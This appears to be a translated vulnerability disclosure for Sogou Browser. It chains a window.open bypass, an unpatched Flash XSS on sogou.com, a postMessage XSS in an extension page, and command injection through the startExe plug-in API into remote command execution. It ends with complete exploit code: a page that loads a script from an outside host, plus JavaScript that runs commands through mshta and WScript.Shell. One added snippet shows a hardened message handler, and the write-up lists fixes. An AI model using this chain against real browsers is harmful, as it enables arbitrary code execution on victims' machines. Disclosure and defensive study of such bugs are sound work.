Sogou Browser Remote Command Execution


This time Sogou made targeted changes to several points of the previous vulnerability, but some points were still not considered carefully enough. This lets us bypass Sogou's repair measures once more and again achieve remote command execution.

In addition, there is no need to deliberately lower the rank value; I won't be going to SGSRC.

1. First, let's list the corrective measures Sogou took against the previous vulnerability.

A. Restricted location.href from jumping directly to se-extension, that is:

location.href = 'se-extension://ext-1055834318/signin.html';

now opens a blank page. Likewise:

window.open('se-extension://ext-1055834318/signin.html');

also opens a blank page.



B. Fixed the XSS in se-extension://ext-1055834318/signin.html, that is, the com.sogou.snapTaker plug-in was updated to version 0.89. The url is now checked like this:

var renrenUrl = "https://graph.renren.com/oauth/authorize?",
    weiboUrl = "https://api.weibo.com/oauth2/authorize?";
if (url && (url.indexOf(renrenUrl) === 0 || url.indexOf(weiboUrl) === 0)) {
    // ... only a url starting with one of these two OAuth endpoints is accepted
}

Since the url must now begin with one of these two prefixes, this XSS is indeed fixed.



C. Changed the startExe API code in npgamecenterlite.dll, that is, the com.sogou.gamecenter plug-in was upgraded to version 1.0.7. (But the plug-in version number in the js/seed.js code under that directory was not updated: var PLUG_VERSION = global['plug_version'] = "1.0.6";)

http://img.wan.sogou.com/cdn/gamehelperV0.3/v1.0.6/app.js?t=1.0.6

The startExe call in this app.js is as follows:

miniLauncher.startExe(url, "/popgame " + exe_param, function(arg) {
    if (arg) {
        utils.pb_cl('2013_popup', 'id=micro_launched');
    }
    log(arg); // if true, the function call succeeded
});





After analysis, we found that in this version startExe takes three parameters. The pseudo code of the function is roughly:

function startExe(url, param, callback) {
    // run the program: url + "sogouminigamepacker.exe" + param, concatenated into a single command line
    runApplication(url + "sogouminigamepacker.exe" + param);
    // then run the callback
    callback(result);
}





In the previous version, startExe had only two parameters: startExe("EXE path", callback function);

The new version was changed so that startExe can only launch the sogouminigamepacker.exe program under a given directory.



---------------------------------------------------------------------



2. Next, we bypass the above repair measures or find new vulnerabilities to get around them.



A. location.href can no longer be used, and window.open also just opens about:blank. But analysis found that, in the about:blank window, location.href = 'se-extension://ext-1055834318/signin.html' can still jump to the se-extension page. So we can use the following method:

// First, window.open the target page; a blank page will be opened.
var w = window.open('se-extension://ext-1055834318/signin.html');
// Then use w.location.href to redirect the opened page.
setTimeout(function() {
    w.location.href = 'se-extension://ext-1055834318/signin.html';
}, 500);





As shown in the screenshot (image not preserved in this copy).
Of course, executing window.open under our own domain will be blocked. However, due to a mechanism of Sogou browser, window.open executed under *.sogou.com is not intercepted by the browser. So to run window.open automatically we need to combine it with an XSS in the sogou.com domain. Being lazy, I went back through the previous Sogou vulnerabilities and found an XSS that was still unrepaired:


http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){alert(1);window.x=1;}}





This XSS came from a vulnerability report a year ago: WooYun: Sogou Browser Remote Command Execution Vulnerability.



At this point we have broken through the first fix and can open any page under se-extension.





B. The old XSS is fixed, so we need to find a new one.



When we analyze se-extension://ext740107210/html/balloon.html, we find that the page registers this message handler:

window.onmessage = function(e) {
    var data = e.data;
    if (data.cmd == "BalloonCloseWin") {
        window.close();
    } else if (data.cmd == "BalloonNoTip") {
        localStorage["balloon_forbidden"] = +new Date();
        window.close();
    } else if (data.cmd == "BalloonStartGame") {
        sogouExplorer.tabs.create({
            url: data.url,
            selected: true
        });
        window.close();
    }
};





As you can see, this onmessage handler checks neither the message origin nor the content of data before passing data.url into sogouExplorer.tabs.create.

If you have done Chrome extension development, you will recognise sogouExplorer.tabs.create as the API for creating a browser tab. What security issue does that raise?

When the url is javascript:alert(1), sogouExplorer.tabs.create is equivalent to executing javascript:alert(1) in the current page. Therefore, with this XSS, we can execute arbitrary script in se-extension://ext740107210/html/balloon.html:

// Pseudo code. w is the window object obtained in step A.
w.postMessage({"cmd": "BalloonStartGame", "url": "javascript:alert(1)"}, "*");
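As an added example, not Sogou's code, here is the hardened form of the balloon.html handler above: it keeps the same three commands but applies the two checks the original lacks, a message-origin allowlist and an http(s)-only rule for data.url, so a javascript: URL never reaches tabs.create. The origin string se-extension://ext740107210 and the shape of the tabs API are assumptions.

```javascript
// Added example (not Sogou's code): a hardened replacement for the balloon.html
// onmessage handler. The decision logic is a pure function so it can be tested
// without the browser; the wiring at the bottom shows how balloon.html would use it.
const TRUSTED_ORIGINS = new Set(["se-extension://ext740107210"]); // assumed origin of the plug-in's own pages
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);           // javascript:, data:, file: etc. are rejected

// Returns a normalised absolute http(s) URL, or null for anything else
// (relative strings, unparsable input, or a disallowed scheme such as javascript:).
function parseGameUrl(candidate) {
  if (typeof candidate !== "string") return null;
  let url;
  try { url = new URL(candidate); } catch (e) { return null; }
  return ALLOWED_PROTOCOLS.has(url.protocol) ? url.href : null;
}

// Decides what the handler should do for a message from `origin` carrying `data`.
function validateBalloonMessage(origin, data) {
  if (!TRUSTED_ORIGINS.has(origin)) return { action: "ignore", reason: "untrusted origin" };
  if (!data || typeof data.cmd !== "string") return { action: "ignore", reason: "malformed message" };
  switch (data.cmd) {
    case "BalloonCloseWin":
      return { action: "close" };
    case "BalloonNoTip":
      return { action: "forbid" };           // caller records the timestamp and closes
    case "BalloonStartGame": {
      const url = parseGameUrl(data.url);
      return url ? { action: "open", url } : { action: "ignore", reason: "disallowed url" };
    }
    default:
      return { action: "ignore", reason: "unknown cmd" };
  }
}

// Wiring inside balloon.html (browser-only, so it is left as a comment here):
// window.onmessage = function (e) {
//   const v = validateBalloonMessage(e.origin, e.data);
//   if (v.action === "forbid") localStorage["balloon_forbidden"] = +new Date();
//   if (v.action === "open") sogouExplorer.tabs.create({ url: v.url, selected: true });
//   if (v.action !== "ignore") window.close();
// };
```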







C. Now that the startExe function has been modified, can arbitrary commands still be executed?

Let's first guess the other side's check rule.



document.getElementById("embed1").startExe("calc.exe", "", function() { console.log(arguments) });



If that is how it works, then by the previous analysis calc.exesogouminigamepacker.exe would be executed, which of course does not run.



We add a space after the program name:

document.getElementById("embed1").startExe("calc.exe ", "", function() { console.log(arguments) });



In theory, calc.exe sogouminigamepacker.exe is executed, with sogouminigamepacker.exe treated as an argument of calc.



But testing this case finds that only the .exe is available.

However, there is no need to execute an exe at all:

document.getElementById("embed1").startExe("calc", "", function() { console.log(arguments) });



Combined with the exploitation code from the previous vulnerability, we modify it to:

document.getElementById("embed1").startExe("mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //","",function(){console.log(arguments)});





D. How do we call document.getElementById("embed1").startExe from the last step?



The XSS page is se-extension://ext740107210/html/balloon.html, while the page containing document.getElementById("embed1").startExe is se-extension://ext740107210/html/back.html.



As you can see, both pages belong to the same plug-in (ext740107210), and se-extension://ext740107210/html/back.html is the background page of se-extension://ext740107210/html/balloon.html.



In plug-in development, Sogou browser provides an API for a plug-in page to quickly obtain the window object of its background page: sogouExplorer.runtime.getBackgroundPage() (see http://ie.sogou.com/open/doc?id=2_16&title=runtime).



Therefore, we can easily change the previous code into the following:

sogouExplorer.runtime.getBackgroundPage().document.getElementById("embed1").startExe("mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //","",function(){console.log(arguments)});





-----------------------------------------------------------------



3. The final exploitation code is as follows:



Sogouhehe.html

<script>window.name="f=document.createElement('script');f.src='http://xsst.sinaapp.com/poc/sogou2.js?'+Math.random();document.body.appendChild(f);";location.href="http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function(){if(!window.x){eval(window.name);window.x=1;}}";</script>





sogou2.js

w = window.open('se-extension://ext740107210/html/balloon.html');
setTimeout(function() {
    w.location.href = 'se-extension://ext740107210/html/balloon.html';
    var x = setInterval(function() {
        if (w) {
            clearInterval(x);
            w.postMessage({
                "cmd": "BalloonStartGame",
                "url": "javascript:sogouExplorer.runtime.getBackgroundPage().document.getElementById('embed1').startExe(\"mshta javascript:(new/**/ActiveXObject('WScript.Shell').run('calc'));window.moveTo(-1000,-1000);window.close(); //\",\"\",function(){console.log(arguments)});"
            }, "*");
        }
    }, 100);
}, 500);

 

Access: http://xsst.sinaapp.com/poc/sogouhehehe.html



Environment: Win7 64-bit.



The effect is as follows (screenshot not preserved in this copy).

Solution:

1. Continue to fix window.open.

2. Fix the balloon.html XSS.

3. Continue to fix the design logic of the startExe function.
